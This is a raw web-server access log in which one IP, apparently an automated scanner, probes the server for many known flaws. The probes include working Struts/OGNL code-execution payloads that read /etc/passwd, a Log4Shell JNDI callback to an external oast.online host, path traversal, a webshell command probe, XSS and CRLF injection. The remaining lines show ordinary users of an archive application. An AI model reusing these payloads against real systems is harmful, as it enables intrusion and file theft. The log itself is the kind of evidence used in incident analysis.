20.125.98.72 - - [25/Jul/2022:02:12:40 +0900] "GET /dashboardUser HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:02:12:40 +0900] "GET /%5cgoogle.com/evil.html HTTP/1.1" 400 795
20.125.98.72 - - [25/Jul/2022:02:12:54 +0900] "POST /login HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:02:12:58 +0900] "GET /perl-status HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:02:13:05 +0900] "GET /apisix/admin/migrate/export HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:02:13:06 +0900] "GET /kylin/api/admin/config HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:02:14:51 +0900] "PUT /_users/org.couchdb.user:poc HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:02:15:21 +0900] "POST /druid/indexer/v1/sampler HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:02:16:14 +0900] "POST /context.json HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:02:16:49 +0900] "POST /login.action HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:02:17:35 +0900] "POST / HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:02:17:39 +0900] "GET null HTTP/1.1" 400 2176
20.125.98.72 - - [25/Jul/2022:02:18:10 +0900] "GET / HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:02:18:30 +0900] "GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:02:18:55 +0900] "GET /index.jsp HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:02:21:59 +0900] "GET null HTTP/1.1" 400 2176
20.125.98.72 - - [25/Jul/2022:04:40:20 +0900] "GET /login/ HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:04:40:26 +0900] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:04:43:05 +0900] "GET /assets/app/something/services/AppModule.class/ HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:05:11:34 +0900] "PUT /fileserver/test.txt HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:05:11:38 +0900] "GET /fileserver/test.txt HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:05:11:48 +0900] "GET /admin/ HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:05:11:52 +0900] "GET /admin/ HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:05:17:56 +0900] "POST /jars/upload HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:05:18:00 +0900] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:05:18:16 +0900] "PUT /poc.jsp/ HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:05:18:20 +0900] "GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:08:42:31 +0900] "GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:08:42:55 +0900] "POST /apisix/admin/user/login HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:08:43:06 +0900] "POST /druid/indexer/v1/sampler?for=connect HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:08:44:14 +0900] "GET / HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:08:45:19 +0900] "POST /dolphinscheduler/login HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:08:46:57 +0900] "GET /webtools/control/main HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:08:51:20 +0900] "POST /jars/upload HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:08:53:25 +0900] "GET /admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68 HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:11:27:12 +0900] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:11:46:39 +0900] "POST /apisix/batch-requests HTTP/1.1" 404 648
20.125.98.72 - - [25/Jul/2022:11:46:43 +0900] "GET /api/2COSXjHe2IAJJpnO5dtEPlRBncf HTTP/1.1" 404 648
20.125.98.72 - - [25/Jul/2022:11:48:44 +0900] "POST / HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:11:48:48 +0900] "GET /2COSXmfnt46QQBl6iPzC7xlynHf.php%5Cx0A HTTP/1.1" 400 878
20.125.98.72 - - [25/Jul/2022:11:50:54 +0900] "POST /axis2-admin/login HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:11:50:58 +0900] "POST /axis2/axis2-admin/login HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:11:51:14 +0900] "GET / HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:11:51:18 +0900] "GET /admin/ HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:11:53:07 +0900] "GET /jkstatus HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:11:53:10 +0900] "GET /jkstatus; HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:14:01:14 +0900] "GET /api/v1/cluster/summary HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:14:03:11 +0900] "POST /webtools/control/xmlrpc HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:14:10:38 +0900] "GET /solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.cbel8dn6lmeo17kdnff0efyryw9371sxj.oast.online/a%7D HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:14:42:12 +0900] "POST /actuator/gateway/routes/2COSXk8OTiSK3pf22yLuPMrZAUz HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:14:42:15 +0900] "POST /actuator/gateway/refresh HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:14:42:19 +0900] "DELETE /actuator/gateway/routes/2COSXk8OTiSK3pf22yLuPMrZAUz HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:15:08:12 +0900] "POST /webtools/control/SOAPService HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:15:08:31 +0900] "GET /~user/%0D%0ASet-Cookie:crlfinjection HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:15:09:43 +0900] "GET /airflow.cfg HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:15:13:38 +0900] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:15:17:24 +0900] "GET /api/experimental/latest_runs HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:15:18:32 +0900] "GET //interact.sh HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:16:54:34 +0900] "GET /api/experimental/test HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:16:54:38 +0900] "GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:16:54:42 +0900] "POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:17:28:32 +0900] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:17:33:45 +0900] "GET /login/ HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:18:04:06 +0900] "GET /printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:18:04:10 +0900] "GET /ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1" 404 682
159.223.74.19 - - [25/Jul/2022:18:05:42 +0900] "GET / HTTP/1.0" 404 721
20.125.98.72 - - [25/Jul/2022:18:09:57 +0900] "POST /apisix/admin/routes HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:18:10:00 +0900] "GET /2COSXpCcPoLDrAKcUW7sLSe6eXn?cmd=id HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:18:17:25 +0900] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 400 878
20.125.98.72 - - [25/Jul/2022:18:17:28 +0900] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1" 400 878
20.125.98.72 - - [25/Jul/2022:19:34:01 +0900] "-" 400 2152
210.92.80.5 - - [25/Jul/2022:20:09:40 +0900] "GET /archiver/sourceContens.do?idx=73 HTTP/1.1" 302 -
210.92.80.5 - - [25/Jul/2022:20:09:40 +0900] "GET /archiver/login.do;jsessionid=AFA84A6C40AB2CCC00ECD3B0A936DB31 HTTP/1.1" 200 2501
210.92.80.5 - - [25/Jul/2022:20:09:50 +0900] "GET /archiver/login.do HTTP/1.1" 200 2501
20.125.98.72 - - [25/Jul/2022:20:15:55 +0900] "POST /v2/api/product/manger/getInfo HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:20:16:14 +0900] "POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:21:15:26 +0900] "POST /control/login HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:21:23:32 +0900] "GET /plugin HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:21:25:23 +0900] "GET /conf HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:21:27:32 +0900] "GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1" 404 682
20.125.98.72 - - [25/Jul/2022:21:28:17 +0900] "GET null HTTP/1.1" 400 2176
20.125.98.72 - - [25/Jul/2022:21:29:50 +0900] "POST /integration/saveGangster.action HTTP/1.1" 404 682
211.234.181.7 - - [25/Jul/2022:21:32:51 +0900] "GET /archiver/login.do HTTP/1.1" 200 2809
211.234.181.7 - - [25/Jul/2022:21:32:52 +0900] "GET /archiver/css/ui.css;jsessionid=67DDA075D53B9F22FC7D344A94DDC0E6 HTTP/1.1" 200 1422
211.234.181.7 - - [25/Jul/2022:21:32:52 +0900] "GET /archiver/js/common.js;jsessionid=67DDA075D53B9F22FC7D344A94DDC0E6 HTTP/1.1" 200 1265
211.234.181.7 - - [25/Jul/2022:21:32:52 +0900] "GET /archiver/js/bootstrap.min.js;jsessionid=67DDA075D53B9F22FC7D344A94DDC0E6 HTTP/1.1" 200 35452
211.234.181.7 - - [25/Jul/2022:21:32:52 +0900] "GET /archiver/js/jquery-1.12.4.min.js;jsessionid=67DDA075D53B9F22FC7D344A94DDC0E6 HTTP/1.1" 200 97166
211.234.181.7 - - [25/Jul/2022:21:32:52 +0900] "GET /archiver/css/bootstrap.min.css;jsessionid=67DDA075D53B9F22FC7D344A94DDC0E6 HTTP/1.1" 200 117154
211.234.181.7 - - [25/Jul/2022:21:32:52 +0900] "GET /archiver/favorit.ico;jsessionid=67DDA075D53B9F22FC7D344A94DDC0E6 HTTP/1.1" 302 -
211.234.181.7 - - [25/Jul/2022:21:32:52 +0900] "GET /archiver/login.do HTTP/1.1" 200 2501
211.234.181.7 - - [25/Jul/2022:21:32:52 +0900] "GET /archiver/favorit.ico;jsessionid=67DDA075D53B9F22FC7D344A94DDC0E6 HTTP/1.1" 302 -
211.234.181.7 - - [25/Jul/2022:21:32:52 +0900] "GET /archiver/login.do HTTP/1.1" 200 2501
211.234.181.7 - - [25/Jul/2022:21:36:11 +0900] "POST /archiver/j_spring_security_check HTTP/1.1" 302 -
211.234.181.7 - - [25/Jul/2022:21:36:11 +0900] "GET /archiver/dashboard.do HTTP/1.1" 200 17712
211.234.181.7 - - [25/Jul/2022:21:36:11 +0900] "GET /archiver/css/css?family=Roboto+Condensed HTTP/1.1" 404 831
211.234.181.7 - - [25/Jul/2022:21:36:12 +0900] "GET /archiver/js/vis-network.js HTTP/1.1" 200 1885561
211.234.181.7 - - [25/Jul/2022:21:36:13 +0900] "POST /archiver/searchFileByMeta.do HTTP/1.1" 200 17680
211.234.181.7 - - [25/Jul/2022:21:36:20 +0900] "POST /archiver/fileDetail.do HTTP/1.1" 200 6641
211.234.181.7 - - [25/Jul/2022:21:36:36 +0900] "GET /archiver/sourceContens.do?idx=104 HTTP/1.1" 200 9134812
211.234.181.7 - - [25/Jul/2022:21:37:07 +0900] "GET /archiver/sourceContens.do?idx=104 HTTP/1.1" 200 21314075
211.234.181.7 - - [25/Jul/2022:21:39:12 +0900] "POST /archiver/fileDetail.do HTTP/1.1" 200 6043
211.234.181.7 - - [25/Jul/2022:21:43:16 +0900] "GET /archiver/sourceContens.do?idx=93 HTTP/1.1" 200 1167942412
211.234.181.7 - - [25/Jul/2022:21:43:19 +0900] "POST /archiver/searchFileByMeta.do HTTP/1.1" 200 18000
211.234.181.7 - - [25/Jul/2022:21:43:25 +0900] "GET /archiver/dashboard.do HTTP/1.1" 200 17712
211.234.181.7 - - [25/Jul/2022:21:43:25 +0900] "GET /archiver/css/css?family=Roboto+Condensed HTTP/1.1" 404 831
211.234.181.7 - - [25/Jul/2022:21:43:39 +0900] "POST /archiver/searchFileByMeta.do HTTP/1.1" 200 12295
211.234.181.7 - - [25/Jul/2022:21:43:45 +0900] "POST /archiver/fileDetail.do HTTP/1.1" 200 6258
211.234.181.7 - - [25/Jul/2022:21:45:13 +0900] "GET /archiver/sourceContens.do?idx=9 HTTP/1.1" 200 44649012
211.234.181.7 - - [25/Jul/2022:21:45:18 +0900] "POST /archiver/fileDetail.do HTTP/1.1" 200 6065
211.234.181.7 - - [25/Jul/2022:21:45:33 +0900] "GET /archiver/sourceContens.do?idx=13 HTTP/1.1" 200 124121444
211.234.181.7 - - [25/Jul/2022:21:45:34 +0900] "GET /archiver/sourceContens.do?idx=13 HTTP/1.1" 200 2320612
211.234.181.7 - - [25/Jul/2022:21:52:40 +0900] "GET /archiver/sourceContens.do?idx=13 HTTP/1.1" 200 124121444
211.234.181.7 - - [25/Jul/2022:21:53:18 +0900] "POST /archiver/fileDetail.do HTTP/1.1" 200 5985
211.234.181.7 - - [25/Jul/2022:21:53:20 +0900] "GET /archiver/sourceContens.do?idx=8 HTTP/1.1" 200 9361240
211.234.181.7 - - [25/Jul/2022:21:58:03 +0900] "GET /archiver/sourceContens.do?idx=8 HTTP/1.1" 200 9361240
20.125.98.72 - - [25/Jul/2022:22:30:54 +0900] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:23:26:46 +0900] "GET /login/ HTTP/1.1" 404 721
20.125.98.72 - - [25/Jul/2022:23:32:56 +0900] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 682
